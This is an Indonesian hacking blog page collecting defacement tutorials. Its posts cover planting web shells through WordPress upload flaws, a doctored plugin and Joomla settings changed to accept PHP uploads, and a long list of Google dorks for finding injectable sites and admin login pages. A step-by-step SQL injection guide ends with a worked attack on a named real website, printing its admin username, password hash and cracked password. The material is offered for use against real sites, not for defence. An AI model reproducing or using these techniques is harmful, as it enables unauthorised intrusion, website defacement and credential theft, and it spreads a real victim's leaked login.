Showing posts with label Deface/Hacking. Show all posts
Showing posts with label Deface/Hacking. Show all posts

Friday, June 28, 2013

Cara Deface Dengan Upload Shell Vulnerability

Assalamualaikum...

Salam Sejahtera bagi kita semua,,,



Okey sobat IDCA, masih bersama ane admin terbaik sejagad,, hajiahh :D yup, kali ini saatnya berbagi lagi... daripada ga ada kerjaan, mending bagi bagi ilmu aja :D
Pada tutorial ini sama dengan CSRF, cuma sedikit berbeda caranya saja, disini ane gunain OS Backtrack, ane udah coba pake Windows, tapi ribet!! >.< Silahkan sobatcoba2 aja gunain Windows OS, tapi kalo ada masalah nantinya  silahkan di solving sendiri yah.. wokwokwok :D

Bahan - Bahan :

1. Script Upload.php | Download

2. Google Dork: inurl:"/wp-content/themes/Brainstorm/"
 #Silahkan Dork dikembangkan lagi 

3. Live Target : Lihat1 & Lihat2


Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah - Langkah :

1. Pertama cari dulu target dengan menggunakan Dork..



2. Disini ane udah nemuin targetnya.. dan langsung aja cari upload.php nya



Penting! Kalo halaman menjadi kosong, ada kemungkinan exploit bisa dijalankan!

3. Sebelumnya letakkan file Uploadify.php dan Shell sobat di folder /var/www/


4. Lalu edit dulu Uploadify.php dengan Notepad, silahkan dirubah yg ane kasi tanda panah seperti Link target, nama file dan folder! Lalu Save kembali..


5. Selanjutnya Buka terminal dan jalankan Apache dengan ketikkan perintah: /etc/init.d/apache2 start lalu enter!



6. Kemudian ketik perintah berikut diterminal : cd /var/www/ lalu enter!! lalu ketik lagi perintah: php uploadify.php lalu enter! dan silahkan sobat tunggu hasilnya!

7. nah tuh, shell telah berhasil diupload ke web,, selanjutnya tinggal eksekusi shell dan Tebas index web.. wokwokwok :D

Note: Ga semua hasilnya sama begitu,, kalo ga nampil seperti gambar, silahkan sobat cari dimana letak shell sobat :D

Good Luck!!!!! :p


sumber: http://porzcommunity.binushacker.net/2013/04/cara-deface-dengan-upload-shell.html

Upload Shell dengan Tamper data

http://jimbojw.com/wiki/images/7/7d/Tamper-data-ongoing-results.png 



Tutor lama nih hehe...cuma mau mellengkapi aja...
kadang kalo kita udah masuk ke admin web sk bingung mau ngapain...
kl mau upload shell langsung aja siapkan bahannya..

1.shell.php <<< contoh ( silahkan cari d google, yg saya pake shell b374k.php)
2.add ons tamper data.. KLIK BAGI YANG BELUM PUNYA 
kl udah kita mulai...
pertama rubah extensi shell anda, contoh shell.php menjadi shell.php.jpg...
kedua cari tempat untuk upload shell kita, seperti di tempat upload gambar, kalo sudah ketemu browse/masukan shell.php.jpg anda..
jangan klik upload dulu, buka tamper data,klik Start tamper baru klik upload
nanti akan ada notice yg keluar, klik tamper, Liat di tamper sebelah kanan disitu kita cari nama shell kita, contoh shell.php.jpg
hapus .jpg nya lalu klik OK...jika sudah selesai dan berhasil terupload close aja tamper datanya...
untuk membuka shell kita, coba cari di halaman mana shell kita upload..jika sudah ketemu klik kanan - view image info, cari disitu..
selesai...


Sumber : http://www.jakengnewbie.net/2011/12/tutor-lama-nih-hehe.html#ixzz1gWhppnyX

Cara Menanam Shell Melalui Upload Plugin | Wordpress

Assalamualaikum
kali ini saya akan menjelaskan bagaimana cara menanam shell melalui upload plugin di wp
langsung saja ya:

Kita disini membutuhkan suatu plugin, anggap aja akismet, lalu kita rubah nama foldernya.
Contoh yang udah jadi => Download

1. Masukan shell ke dalam folder tersebut
2. Pergi ke Plugins > Add New > Upload. lalu pilih .zip yang tadi di download lalu tekan tombol "Install Now !"

3. Cuekin saja kalau Error seperti gambar dibawah ini.

4. Akses di 
http://localhost.com/wp-content/plugins/namafolder/namashell.php


Note : tutorial ini diperuntukan jika tempat editor [theme editor dan plugin editor] di proteksi atau untuk alternatif jika tidak mengganti script web samasekali.
Sumber :  207 Cyber Security

Cara Mudah Upload Shell (Backdoor) di Web Joomla

Kali ini saya akan share cara mudah upload shell di web CMS Joomla. kadang kita masih bingung saat menemukan web Joomla namun tidak tahu cara upload shell. Oleh karena itu kali ini saya akan berbagi trik upload shell di Joomla.
Step 1 :
Oke, saya anggap kalian sudah login ke Web Joomla. Klik Global Configuration.
Lihat Gambar :



Step 2:
Lalu klik bagian System :
Perhatikan sub bagian dibawahnya :
Legal Extensions (File Types) : tambahkan ekstensi php
Restrict Uploads : pilih NO
Check MIME Types : pilih NO
Legal Image Extensions (File Types) : tambahkan ekstensi php
Legal MIME Types : tambahkan image/php


Lalu klik save

Step 3:
Klik menu Media Manager
Upload Shell disitu.


Step 4 :
Sekarang kita panggil shellnya.
Lokasiya di http://[site]/images/[shell.php]
Sekarang terserah anda mau diapain tuh situs. Mau dideface terserah. :p
Sekian tutorial kali ini. Semoga bermanfaat.

sumber: http://www.madura-cyber.org/

Wednesday, December 19, 2012

Dork Lengkap Untuk SQLi Havij SQL Helper Dll

Hello teman-teman seperjuangan, sebelumnya kita perkenalan dulu ya. Nama saya Ahmad Farhan Fauzan biasa dipanggil Farhan. Oke, kalau ada hal yang perlu di tanyakan komentar saja atau chat yang ada di bawah jika saya online.
ok lansung saja ke intinya.




 [+] Tools
 [-] Google atau bisa juga dengan SQL Injection Scanner [for scan vuln site]

inurl:/general.php?*id=*
inurl:/careers-detail.asp?id=
inurl:/WhatNew.asp?page=&id=
inurl:/gallery.asp?cid=
inurl:/publications.asp?type=
inurl:/mpfn=pdview&id=
inurl:/reservations.php?id=
inurl:/list_blogs.php?sort_mode=
inurl:/eventdetails.php?*=
inurl:/commodities.php?*id=
inurl:/recipe-view.php?id=
inurl:product.php?mid=
inurl:view_ad.php?id=
inurl:/imprimir.php?id=
inurl:/prodotti.php?id=
inurl:index.cgi?aktion=shopview
inurl:/default.php?id=
inurl:/default.php?portalID=
inurl:/*.php?id=
inurl:/articles.php?id=
inurl:/os_view_full.php?
inurl:/Content.asp?id=
inurl:/CollectionContent.asp?id=
inurl:/Details.asp?id=
intext:"Powered By : SE Software Technologies" filetype:php
inurl:/index.php?pgId=
inurl:/index.php?PID= "Powered By Dew-NewPHPLinks v.2.1b"
inurl:/dosearch.asp?
inurl:/details.php?linkid=
inurl:/viewfaqs.php?cat=
inurl:/calendar.php?token=
inurl:/games.php?id= "Powered by PHPD Game Edition"
inurl:/gmap.php?id=
allinurl:*.php?txtCodiInfo=
inurl:/notizia.php?idArt=
inurl:read.php?=
inurl:"ViewerFrame?Mode="
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu
intext:"Mail admins login here to administrate your domain."
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Storage Management Server for" intitle:"Server Administration"
intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee
intext:"vbulletin" inurl:admincp
intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press
intitle:"Admin Login" "admin login" "blogware"
intitle:"Admin login" "Web Site Administration" "Copyright"
intitle:"EXTRANET * - Identification"
intitle:"EXTRANET login" -.edu -.mil -.gov
intitle:"EZPartner" -netpond
intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -
intitle:ANNOUNCE -inurl:lists
intitle:"i-secure v1.1" -edu
intitle:"Icecast Administration Admin Page"
intitle:"iDevAffiliate - admin" -demo
intitle:"ISPMan : Unauthorized Access prohibited"
intitle:"ITS System Information" "Please log on to the SAP System"
intitle:"Kurant Corporation StoreSense" filetype:bok
intitle:"ListMail Login" admin -demo
intitle:"Login -
intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman
intitle:"Login to Cacti"
intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id=
intitle:"MailMan Login"
intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi
intitle:"Merak Mail Server Web Administration" -ihackstuff.com
intitle:"microsoft certificate services" inurl:certsrv
intitle:"MikroTik RouterOS Managing Webpage"
intitle:"MX Control Console" "If you can't remember"
intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf
intitle:"Novell Web Services" intext:"Select a service and a language."
intitle:"oMail-admin Administration - Login" -inurl:omnis.ch
intitle:"OnLine Recruitment Program - Login"
intitle:"Philex 0.2*" -s?ri?t -site:freelists.org intitle:"PHP Advanced Transfer" inurl:"login.php"
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"phpPgAdmin - Login" Language
intitle:"PHProjekt - login" login password
intitle:"please login" "your password is *"
intitle:"Remote Desktop Web Connection" inurl:tsweb
intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"
intitle:"SHOUTcast Administrator" inurl:admin.cgi
intitle:"site administration: please log in" "site designed by emarketsouth"
intitle:"Supero Doctor III" -inurl:supermicro
intitle:"SuSE Linux Openexchange Server" "Please activate Javas?ri?t!"
intitle:"teamspeak server-administration
intitle:"Tomcat Server Administration"
intitle:"TOPdesk ApplicationServer"
intitle:"TUTOS Login"
intitle:"TWIG Login"
intitle:"vhost" intext:"vHost . 2000-2004"
intitle:"Virtual Server Administration System"
intitle:"VisNetic WebMail" inurl:"/mail/"
intitle:"VitalQIP IP Management System"
intitle:"VMware Management Interface:" inurl:"vmware/en/"
intitle:"VNC viewer for Java"
intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org
intitle:"WebLogic Server" intitle:"Console Login" inurl:console
intitle:"Welcome Site/User Administrator" "Please select the language" -demos
intitle:"Welcome to Mailtraq WebMail"
intitle:"welcome to netware *" -site:novell.com
intitle:"WorldClient" intext:"? (2003|2004) Alt-N Technologies."
intitle:"xams 0.0.0..15 - Login"
intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin
intitle:"XMail Web Administration Interface" intext:Login intext:password
intitle:"Zope Help System" inurl:HelpSys
intitle:"ZyXEL Prestige Router" "Enter password"
intitle:"inc. vpn 3000 concentrator"
intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com
intitle:asterisk.management.portal web-access
intitle:endymion.sak?.mail.login.page | inurl:sake.servlet
intitle:Group-Office "Enter your username and password to login"
intitle:ilohamail " IlohaMail"
intitle:ilohamail intext:"Version 0.8.10" " IlohaMail"
intitle:IMP inurl:imp/index.php3
intitle:Login * Webmailer
intitle:Login intext:"RT is ? Copyright"
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"
intitle:open-xchange inurl:login.pl
intitle:Ovislink inurl:private/login
intitle:phpnews.login
intitle:plesk inurl:login.php3
inurl:"/admin/configuration. php?" Mystore
inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"
inurl:"1220/parse_xml.cgi?"
inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)
inurl:":10000" intext:webmin
inurl:"Activex/default.htm" "Demo"
inurl:"calendar.asp?action=login"
inurl:"default/login.php" intitle:"kerio"
inurl:"gs/adminlogin.aspx"
inurl:"php121login.php"
inurl:"suse/login.pl"
inurl:"typo3/index.php?u=" -demo
inurl:"usysinfo?login=true"
inurl:"utilities/TreeView.asp"
inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp
inurl:/admin/login.asp
inurl:/cgi-bin/sqwebmail?noframes=1
inurl:/Citrix/Nfuse17/
inurl:/dana-na/auth/welcome.html
inurl:/eprise/
inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net
inurl:/modcp/ intext:Moderator+vBulletin
inurl:/SUSAdmin intitle:"Microsoft Software upd?t? Services"
inurl:/webedit.* intext:WebEdit Professional -html
inurl:1810 "Oracle Enterprise Manager"
inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com
inurl::2082/frontend -demo
inurl:administrator "welcome to mambo"
inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0
inurl:cgi-bin/ultimatebb.cgi?ubb=login
inurl:Citrix/MetaFrame/default/default.aspx
inurl:confixx inurl:login|anmeldung
inurl:coranto.cgi intitle:Login (Authorized Users Only)
inurl:csCreatePro.cgi
inurl:default.asp intitle:"WebCommander"
inurl:exchweb/bin/auth/owalogon.asp
inurl:gnatsweb.pl inurl:ids5web
inurl:irc filetype:cgi cgi:irc
inurl:login filetype:swf swf
inurl:login.asp
inurl:login.cfm
inurl:login.php "SquirrelMail version"
inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
inurl:mewebmail
inurl:names.nsf?opendatabase
inurl:ocw_login_username
inurl:orasso.wwsso_app_admin.ls_login
inurl:postfixadmin intitle:"postfix admin" ext:php
inurl:search/admin.php
inurl:textpattern/index.php
inurl:WCP_USER
inurl:webmail./index.pl "Interface"
inurl:webvpn.html "login" "Please enter your"

Saturday, December 15, 2012

Deface Web Dengan Cara SQL Injection

Sqli (alias Sql Injection atau Structured Query Language Injeksi) adalah langkah pertama dalam entri untuk memanfaatkan atau hacking website. Hal ini mudah dilakukan dan merupakan titik dari awal yang bagus. Sayangnya tutorial yang sedikit rumit sehingga itulah sebabnya ane menulis ini. Sqli pada dasarnya hanyalah suntikan pertanyaan ke dalam database atau menggunakan query untuk mendapatkan bypass otorisasi sebagai sebuah admin.




Untuk Mencari Inject
Mencari SQLI sangat mudah,semua yang perlu ente2 lakukan adalah Googling . Hal pertama yang perlu ente2 lakukan adalah menemukan beberapa dorks
dork nya bisa di klik di sini

PART 1

Pilih salah satu dorks dan menambahkan inurl: sebelum
(Jika mereka belum memiliki itu) dan kemudian salin dan sisipkan
ke google. Pilih salah satu situs dari google dan chek 1-1.
Sebagai contoh url dari halaman ente berada mungkin terlihat seperti ini
Code:

http://www.example.com/index.php?id=3

untuk memeriksa adanya Bug MySQL tinggal tambahin “‘”di akhir URL
contoh
Code:

http://www.example.com/index.php?id=3'

tekan enter sampai ente2 mendapatkan ERROR
Mendapatkan Jumlah Kolom
Setelah ente menemukan situs yg udah di siapin ,langkah pertama yang perlu ente2 ambil adalah
untuk menemukan jumlah kolom. Cara termudah untuk melakukannya adalah
menggunakan pernyataan “order by”. Yang harus ente lakukan adalah meletakkan ORDER BY (angka) -
pada akhir url ente. Jadi seharusnya terlihat seperti ini.
Code:

http://www.example.com/index.php?id=3 ORDER BY (number)--

setelahnya ane ubah jadi bahasa inggris dah..
capek translatenya
wkwkwkwkwkwkwkwkwkw :P
Yuk kita lanjutkan ke order by 8–kamu akan mendapatkan sebuah error. Ini membuktikan bahwa table database hanya memiliki 7 kolom, ini dibuktikan bahwa ketika anda melakukan order by lebih dari 7, akan selalu error. Jika kamu memiliki memory yang kurang baik, silakan buka notepad &catat kolom-kolom yang anda temukan.
Menemukan kolom yang dapat di akses

Setelah kita mengetahui kolom yang ada di table database, sekarang kita akan mencari informasi &data apa yang bisa diambil dari sana.
Kita melakukan hal tersebut dengan menggunakan fungsi “UNION”“SELECT”dan NOMOR KOLOM. Kita selipkan seluruhnya dalam URL, seperti contoh berikut:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

Jangan lupa untuk menyisipkan tanda “-”sebelum code dimulai, jadi sebagai contoh di atas kita selipka tanda “-”didepan angka “3“, nah setelah semua dilakukan, maka akan muncul table yang memiliki isi didalamnya. Catatlah nomor kolom table yang memiliki informasi di dalam database tersebut. Klo lupa, simpan dulu di notepad.
Finding MySQL Database Version
Sebelum kita melanjutkan hal ini, maka yang perlu kita ketahui adalah versi dari database.
URL nya adalah sebagai berikut:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

Kita ganti angka “1”dengan  “@@version”untuk mengetahui informasi versi database, berikut contohnya:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+@@version,2,3,4,5,6,7--

Tekan enter, maka anda akan menemukan informasi database yang digunakan.
Hal ini biasanya bekerja pada versi database 5.* keatas.
Finding Database Names

Selanjutkan kita akan inject website untuk menemukan database names. Kita lakukan hal ini dengan mengganti “@@version
dengan “group_concat(schema_name)”dan juga ditambahkan “+ from+information_schema.schemata–”sesudah nomor kolom terakhir di table database.
Seperti ini contoh URLnya:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat(schema_name),2,3,4,5,6,7+ from+information_schema.schemata--

Hal tersebut akan menunjukkan daftar nama database. Sekarang untuk menemukan database mana yang saat ini dipakai adalah dengan mengganti “group_concat(schema_name)”dengan concat(database()) dan hapus “+ from+information_schema.schemata
Jadi URL nya akan menjadi seperti ini:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+concat(database()),2,3,4,5,6,7--

Selamat, anda telah mendapatkan informasi database yang saat ini digunakan.
Menemukan Nama Table

Untuk mengetahui nama table yang digunakan dalam database, anda harus mengganti “concat(database())”dengan group_concat(table_name) dan tambahkan “from information_schema.tables where table_schema=database()”diantara nomor awal dan “–”hapus juga tanda “+”dari “union select“.
Urlnya akan tampak seperti berikut:
Code:

http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()--

Nah, hal tersebut akan menampilkan nama table yang digunakan di database.
Menemukan Nama Kolom

Lakukan dengan hanya merubah “table_name”ke “column_name”dan “information_schema.tables”ke “information_schema.columns”.
Url akan tampak seperti ini:
Code:

http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()--

Hal tersebut akan memunculkan nama table.
Misalkan nama colom seperti berikut:
admin_username
admin_password
Mengambil Informasi Database
Sekarang kita sudah mengetahui “database name, table names, dan colomn names”, kita bisa menyatukannya bersama-sama dan mengeluarkan informasi yang ada di sana, kita lakukan dengan contoh berikut:
Code:

http://www.example.com/index.php?id=-3 union select 1,group_concat(Columnname,0x3a,columnname,0x3a),2,3,4,5,6,7 from databasename.tablename--

Sekarang ganti “columnname”dengan kolom yang anda mau ambil informasinta. “0x3a”akan membuat jeda diantara informasi yang anda dapatkan dari masing-masing colom. Jangan lupa juga untuk merubah “databasename.tablename”dengan database dan nama tabel dimana kolom ada di database dan tabel tersebut.
Sebagai contoh:
Code:

http://www.example.com/index.php?id=-3 union select 1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7 from whippit.t_admin--

Sekarang anda akan mendapatkan informasi username &database
Credit: Madun &Diperbaiki Oleh BinusHacker Team

PART 2

Mari kita coba praktekkan cara diatas!
Sebagai contoh kita mendapatkan target sebagai berikut:
Code:
1
http://www.cocobod.gh/news_details.php?id=30
Sekarang kita akan melakukan pengecekan apakah website tersebut memiliki vulnerability dengan menambahkan tanda di akhir URL, contohnya sebagai berikut:
Code:
1
http://www.cocobod.gh/news_details.php?id=30'
Jika kita menemukan error, maka terdapat vulnerability di website tersebut, sebagai contoh:

Setelah kita mengetahui ada vulnerability, maka langkah selanjutkan adalah kita harus mengetahui berapa jumlah kolom yang ada di table tersebut.
Kita akan mengetahuinya sampai ada informasi “Unknown Column“.
Lakukan pengecekan dengan menggunakan perintah “order by“.
Kita akan mencoba dari 1……..tak hingga, jadi bisa saja 1,2,3,4,5,6,7,dst.
Kebetulah dalam target ini hanya terdapat 7 kolom dalam table yang ada di database,
Contohnya:

Langkah pengetesannya adalah
Code:
1
2
3
4
5
6
7
8
http://www.cocobod.gh/news_details.php?id=30 order by 1-- &gt;&gt; no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- &gt;&gt; no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- &gt;&gt; no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- &gt;&gt; no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- &gt;&gt; no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- &gt;&gt; no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- &gt;&gt; no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- &gt;&gt; Unknown column

http://www.cocobod.gh/news_details.php?id=30 order by 8– *>> Unknown column
Hal tersebut membuktikan bahwa tidak ada kolom ke 8 dalam table tersebut, jadi cuman ada 7 kolom.

Langkah selanjutnya adalah, mencari kolom yang dapat di akses!

Kita sudah mengetahui, jumlah kolom adalah 7, kita gunakan perintah “UNION SELECT number,of,columns–” untuk mengatahui kolom mana yang dapat di akses:
Code:



1
<strong>http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--</strong>





Muncul 6, 2, 3 kan? Kolom dalam tersebutlah yang bisa anda akses dan anda ambil informasinya.


Langkah selanjutnya, mencari informasi versi database


SQL Injection bekerja baik pada versi 5.* ke atas, untuk mendapatkan informasi database version, kita masukkan saja “@@version”, pada kolom dimana saja yang bisa dipakai.
Misalkan kolom “6″ kita ganti dengan “@@version”



Code:

1
<strong>http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--</strong>



Akan muncul versi database 5.1.39, ini berarti database bisa di inject :)

Mengetahui Database Name


Langsung ajah kita replace kolom yang tadi digunakan “6,2,3″ dibagian mana saja, kita gunakan kolom “6″, kita ganti dengan code berikut “group_concat(schema_name)” , dan jangan lupa tambahkan “from information_schema.schemata–” sesudah kolom terakhir.

Code:


1
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--

Mengatahui Database Yang Dipakai
Langsung ajah ganti “group_concat(schema_name)” dengan “concat(database())” seperti contoh berikut:
Code:
1
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--

Selamat, anda telah mengetahui database yang dipakai saat ini adalah “cocobod_gh“.
Mengetahui Nama Tabel

Langsung aja ganti “group_concat(table_name)” dan tambahkan “from information_schema.tables where table_schema=database()–” setelah kolom terakhir.
Code:
1
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--

Mengatahui Nama Kolom

Untuk mengetahui nama kolom, kita gunakan query berikut:
group_concat(column_name)
from information_schema.columns where table_schema=database()–

Code:
1
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--

Mengambil Informasi Yang Ada Di Dalam Kolom

Ini adalah step akhir, dimana anda akan mendapatkan informasi mengenai isi dari kolom yang berada dalam table di database.
Eksekusi perintah berikut:

Code:
1
http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from currentdb.tableused--
Exploit akan menjadi seperti berikut :
Code:
1
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from cocobod_gh.coc_admin--

Dari informasi di atas kita mendapatkan data: “comaster:2c39e3769d300f7e23f8a9e1e21773e7 ,
Silakan check ke MD5 decrypter untuk mendecrypt password -> http://www.md5decrypter.co.uk/ paste MD5 password yang tadi yaitu: “2c39e3769d300f7e23f8a9e1e21773e7“, anda akan medapatkan result seperti dibawah:


comaster:2c39e3769d300f7e23f8a9e1e21773e7
comaster:cocoadmin4682
username : comaster
password : cocoadmin4682

Selamat, anda sudah bisa login ke page dengan user & password di atas :)


Sumber: http://www.binushacker.net

Membedakan Hacker,Cracker,Defacer,Phreaker,Hacker Wannabe,Script kiddies,Scammer, dan Newbie

Untuk bahan iseng saja karena saya lagi muak… kebetulan heran saja kenapa semakin banyak manusia aneh di blog ini yang kurang mengetahui pengetahuan umum tentang dasar-dasar komputer, pemrograman dasar, jaringan tingkat tinggi dan lainnya, tapi ingin sekali di beri julukan “hacker”? untuk pengakuan diri? ataukah cuma sekedar ego sesaat untuk mendapatkan support/dukungan? biar terlihat keren? biar di segani kawan dan lawan?
Sebenarnya kalau ditanya arti hacker itu apa sih? pasti jawaban umumnya adalah orang hebat yang menguasai komputer bla bla bla… tanpa di sadari perbedaan dan harfiah yang sebenarnya semakin lama semakin hilang tenggelam dan akhirnya muncullah para newbie yang memberi label pada diri mereka sendiri dengan label “hacker” abal-abal.
